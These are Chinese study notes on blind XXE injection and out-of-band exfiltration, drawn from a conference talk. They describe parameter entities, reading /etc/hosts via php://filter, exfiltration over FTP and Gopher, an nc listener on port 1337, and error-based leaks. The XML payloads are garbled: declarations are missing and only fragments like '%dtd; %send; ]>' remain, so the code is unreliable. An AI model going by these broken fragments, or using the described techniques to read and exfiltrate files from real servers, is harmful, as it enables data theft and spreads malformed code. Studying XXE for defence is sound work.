【注入】xml盲注

OOB（Out-Of-Band）：外带数据
多数情况下，能直接返回目标内容的攻击场景很少，因此需要一些技巧
来获取我们想要的数据。
• 参数实体（Parameter Entity）：
如果说实体是XML节点中引用的内容，那么参数实体就是实体中引
用的内容。

">
1）参数实体只能在DTD声明中使用。
2）参数实体中不能再引用参数实体。

    
    %dtd;
    %send;
]>



">%all;

PHP环境下可以使用php://filter：
php://filter/read=convert.base64-encode/resource=/etc/hosts
利用FTP协议外带数据
两者相结合

%asd;
%c;
%rrr;
]>



">

Gopher：古老的信息查找协议 【Java1.6】
格式：gopher://{host}:{port}/{type}{request}
• type：为一位整型数字
• request：任意要发送的请求内容，使用URL格式编码。

在服务器中使用NC监听指定端口：
nc –lnp 1337

%dtd;
]>


">%all;

无效文件名构造主动报错
evil.xml

%one;
%two;
%four;
]>


">

资料来源：5-XML实体攻击：从内网探测到命令执行步步惊心-张天琪.pdf